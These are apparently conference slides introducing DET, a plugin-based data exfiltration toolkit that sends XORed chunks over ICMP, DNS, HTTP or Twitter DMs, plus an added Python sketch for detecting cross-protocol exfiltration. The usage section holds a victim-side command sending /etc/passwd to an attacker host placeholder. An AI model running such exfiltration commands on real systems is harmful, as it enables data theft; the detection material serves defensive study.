23rd of October 2015
Paul Amar @SensePost
Data Exfiltration Toolkit (DET)
- Modular (Plugins)
- Supports ICMP, DNS, HTTP and Twitter DMs
- One file - det.py (client/server)
- Plugin-based (in ./plugins)
- Listens on specific services (DNS, HTTP, Twitter, ICMP)
- Each module can have its own logic. Sweet, eh?
- Takes a chunk of data, XORs it and sends it.
- Plugin chosen randomly for each 'message'
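Because the plugin is chosen randomly for each message, a rule that counts one protocol at a time sees only a fraction of the transfer. The following detection sketch is an added example, not part of the original slides or of DET: it correlates flows per source/destination pair across protocols. The flow records, field layout and thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict

# Constructed flow records: (epoch seconds, source, destination, protocol).
# Assumption: every chunk travels directly to the listener address, so
# relayed channels (a DNS resolver, Twitter DMs) are outside this sketch.
FLOWS = [
    (1000, "10.0.0.5", "203.0.113.9", "dns"),
    (1004, "10.0.0.5", "203.0.113.9", "icmp"),
    (1009, "10.0.0.5", "203.0.113.9", "http"),
    (1015, "10.0.0.5", "203.0.113.9", "dns"),
    (1021, "10.0.0.5", "203.0.113.9", "http"),
    (1026, "10.0.0.5", "203.0.113.9", "icmp"),
    (1030, "10.0.0.5", "203.0.113.9", "dns"),
    (1034, "10.0.0.5", "203.0.113.9", "icmp"),
    (1040, "10.0.0.5", "203.0.113.9", "http"),
    (1002, "10.0.0.7", "198.51.100.20", "http"),
    (1011, "10.0.0.7", "198.51.100.20", "http"),
    (1019, "10.0.0.7", "198.51.100.20", "http"),
    (1033, "10.0.0.7", "198.51.100.20", "http"),
    (1005, "10.0.0.8", "192.0.2.53", "dns"),
    (1025, "10.0.0.8", "192.0.2.53", "dns"),
]

def per_protocol_alerts(flows, threshold=5):
    """Baseline rule: one protocol alone must reach the threshold."""
    counts = Counter((src, dst, proto) for _ts, src, dst, proto in flows)
    return {key: n for key, n in counts.items() if n >= threshold}

def cross_protocol_suspects(flows, window=60, min_protocols=3, min_events=6):
    """Flag (src, dst) pairs that mix several protocols inside one window."""
    by_pair = defaultdict(list)
    for ts, src, dst, proto in flows:
        by_pair[(src, dst)].append((ts, proto))
    suspects = {}
    for pair, events in by_pair.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window's left edge forward
            counts = Counter(proto for _ts, proto in events[start:end + 1])
            busy = sum(counts.values()) >= min_events
            if busy and len(counts) >= min_protocols:
                if sum(counts.values()) > sum(suspects.get(pair, {}).values()):
                    suspects[pair] = dict(counts)  # keep the densest window
    return suspects

if __name__ == "__main__":
    print(per_protocol_alerts(FLOWS), cross_protocol_suspects(FLOWS))
```

On the constructed data the per-protocol rule stays silent, while the cross-protocol correlation flags only the host that spreads its traffic over DNS, ICMP and HTTP.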
How to use it?
Server (Attacker Side)
(sudo) python det.py -v -L
Client (Victim Side)
(sudo) python det.py -f /etc/passwd -t x.x.x.x -v
- Wanna contribute? PR your Plugins
- Release this on GitHub
- Test it against IDS (with SecData?)